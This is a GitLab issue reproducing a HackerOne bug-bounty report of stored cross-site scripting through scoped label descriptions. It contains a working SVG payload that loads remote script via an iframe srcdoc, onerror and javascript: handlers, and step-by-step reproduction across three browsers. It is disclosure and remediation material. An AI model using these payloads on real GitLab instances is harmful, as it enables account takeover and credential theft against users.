Skip to content

Stored XSS in scoped labels

HackerOne report #1050189 by mike12 on 2020-12-03, assigned to @rchan-gitlab:

Report | Attachments | How To Reproduce

Report

Hi Gitlab!

It's possible to inject arbitrary JS code into markdown using the scoped label description.

This XSS works for:

  1. gitlab.com using Firefox (tested in Firefox 83.0)
  2. A self-hosted GitLab instance without CSP using Safari (tested in Safari 13.1)
  3. A self-hosted GitLab instance without CSP using Chrome for Android (tested in Chrome for Android 86.0.4240.198)

Steps to reproduce using Firefox

  1. Open your browser and navigate to https://gitlab.com

  2. Create a new project

  3. Add a file named demo.svg to the project with the following content:

    <svg id="x"  
     xmlns="http://www.w3.org/2000/svg"  
     width="100"  
     height="100"  
>  
    <!-- gitlab.com using Firefox -->  
    <foreignObject>  
        <iframe xmlns="http://www.w3.org/1999/xhtml"  
                srcdoc='<script src=https://gitlab.com/mike12-h1/csp/-/raw/master/index.js> </script>'></iframe>  
    </foreignObject>

    <!-- A self-hosted GitLab instance without CSP using Safari -->  
    <image href="foo" onerror="alert('onerror')"/>

    <!-- A self-hosted GitLab instance without CSP using Chrome for Android -->  
    <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert('xlink:href')">  
        <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red"/>  
        <text x="50%" y="50%" text-anchor="middle" stroke="#000000" stroke-width="1px" dy=".3em">Click me</text>  
    </a>  
</svg>

  4. Navigate to Issues > Labels

  5. Create a new scoped label

    1. Title: xss::demo
    2. Description: demo &<a>lt;svg>&<a>lt;use xlink:href="/<YOUR-USERNAME>/<YOUR-PROJECT>/-/raw/master/demo.svg#x" /></svg> (Replace <YOUR-USERNAME> and <YOUR-PROJECT> with your values)

  6. Navigate to Wiki

  7. Create a new wiki page with the following content: ~"xss::demo"

  8. Open the created wiki page

  9. Hover your mouse over the label

1.png

Steps to reproduce using Safari

  1. Run a self-hosted Gitlab instance
  2. Repeat steps 2 through 9 from the "Steps to reproduce using Firefox" section.

Steps to reproduce using Chrome for Android

  1. Run a self-hosted Gitlab instance
  2. Repeat steps 2 through 8 from the "Steps to reproduce using Firefox" section.
  3. Tap and hold the label. A pop-up window should appear.
  4. Tap outside the pop-up window to close it
  5. Tap on the red circle in the label tooltip.

2.mp4

Impact

An attacker can:

  1. Perform any action within the application that a user can perform
  2. Steal sensitive user data, including credentials

Example attack scenario

  1. Create a public project
  2. Create a label in the project with the XSS payload
  3. Add the label attacker/project~"label::name" to issue comments in several public projects

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section:

Potential Fix

#291004 (comment 460511992)

Availability and Testing

Ensure proper feature specs are added.

Edited by Désirée Chevalier